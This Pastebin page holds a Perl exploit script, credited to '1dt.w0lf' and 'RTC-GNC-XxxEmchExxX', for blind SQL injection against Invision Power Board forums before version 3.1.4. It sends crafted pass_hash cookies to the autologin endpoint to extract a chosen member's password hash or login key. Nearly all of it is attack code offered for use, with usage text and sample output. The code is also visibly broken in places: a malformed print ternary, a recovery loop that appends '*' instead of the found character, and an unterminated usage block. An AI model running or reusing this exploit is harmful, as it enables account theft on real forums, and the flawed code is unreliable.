Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- ## Invision Power Board SQL injection exploit by RTC-GNC-XxxEmchExxX
- ## vulnerable forum versions : 1.* , 2.* ,3.*(<3.1.4)
- ## tested on version 1 Final and version 3.1.4
- ## * work on all mysql versions
- ## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
- ## (c)oded by 1dt.w0lf
- ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- ## screen:
- ## ~~~~~~~
- ## r57ipb3.pl blah.com /ipb13/ 1 0
- ## [~] SERVER : blah.com
- ## [~] PATH : /ipb13/
- ## [~] MEMBER ID : 1
- ## [~] TARGET : 0 - IPB 1.*
- ## [~] SEARCHING PASSWORD ... [ DONE ]
- ##
- ## MEMBER ID : 1
- ## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
- ##
- ## r57ipb3.pl blah.com /ipb314/ 1 1
- ## [~] SERVER : blah.com
- ## [~] PATH : /ipb314/
- ## [~] MEMBER ID : 1
- ## [~] TARGET : 1 - IPB 2.*
- ## [~] SEARCHING PASSWORD ... [ DONE ]
- ##
- ## MEMBER ID : 1
- ## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
- ##
- ## r57ipb3.pl blah.com /ipb314/ 1 1
- ## [~] SERVER : blah.com
- ## [~] PATH : /ipb314/
- ## [~] MEMBER ID : 1
- ## [~] TARGET : 1 - IPB 3.*
- ## [~] SEARCHING PASSWORD ... [ DONE ]
- ##
- ## MEMBER ID : 1
- ## MEMBER_LOGIN_KEY : f103c2ff0937a1e1def351c34bf22d
- ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- ## Greets: James Bercegay of the GulfTech Security Research Team N RST/GHC
- ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- ## Credits: XxxEmchExxX , www.xxxemchexxx.blogspot.com
- ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- use IO::Socket;
- if (@ARGV < 4) { &usage; }
- $server = $ARGV[0];
- $path = $ARGV[1];
- $member_id = $ARGV[2];
- $target = $ARGV[3];
- $pass = ($target)?('member_login_key'):('password');
- $server =~ s!(http:\/\/)!!;
- $request = 'http://';
- $request .= $server;
- $request .= $path;
- $s_num = 1;
- $|++;
- $n = 0;
- print "[~] SERVER : $server\r\n";
- print "[~] PATH : $path\r\n";
- print "[~] MEMBER ID : $member_id\r\n";
- print "[~] TARGET : $target";
- print (($target)?(' - IPB 3.*'):(' - IPB 2.*'):(' - IPB 1.*'));
- print "\r\n";
- print "[~] SEARCHING PASSWORD ... [|]";
- ($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
- while(1)
- {
- if(&found(47,58)==0) { &found(96,122); }
- $char = $i;
- if ($char=="0")
- {
- if(length($allchar) > 0){
- print qq{\b\b DONE ]
- MEMBER ID : $member_id
- };
- print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
- print $allchar."\r\n";
- }
- else
- {
- print "\b\b FAILED ]";
- }
- exit();
- }
- else
- {
- $allchar .= chr(42);
- }
- $s_num++;
- }
- sub found($$)
- {
- my $fmin = $_[0];
- my $fmax = $_[1];
- if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
- $r = int($fmax - ($fmax-$fmin)/2);
- $check = " BETWEEN $r AND $fmax";
- if ( &check($check) ) { &found($r,$fmax); }
- else { &found($fmin,$r); }
- }
- sub crack($$)
- {
- my $cmin = $_[0];
- my $cmax = $_[1];
- $i = $cmin;
- while ($i<$cmax)
- {
- $crcheck = "=$i";
- if ( &check($crcheck) ) { return $i; }
- $i++;
- }
- $i = 0;
- return $i;
- }
- sub check($)
- {
- $n++;
- status();
- $ccheck = $_[0];
- $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
- $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";
- $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
- $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
- $nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20";
- $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
- printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection:
- close\n\n",
- $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);
- while(<$socket>)
- {
- if (/Set-Cookie: session_id=0;/) { return 1; }
- }
- return 0;
- }
- sub status()
- {
- $status = $n % 5;
- if($status==0){ print "\b\b/]"; }
- if($status==1){ print "\b\b-]"; }
- if($status==2){ print "\b\b\\]"; }
- if($status==3){ print "\b\b|]"; }
- }
- sub usage()
- {
- print q(
- Invision Power Board v < 3.1.4 SQL injection exploit
- ----------------------------------------------------
- USAGE:
- ~~~~~~
- r57ipb3.pl [server] [/folder/] [member_id] [target]
- [server] - host where IPB installed
- [/folder/] - folder where IPB installed
- [member_id] - user id for brute
- targets:
- 0 - IPB 1.*
- 1 - IPB 2.*
- 2 - IPB 3.* (Prior To 3.1.4)
- e.g. r57ipb3.pl 127.0.0.1 /IPB/ 1 1
- ----------------------------------------------------
- print $target(' - IPB 3.*');
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement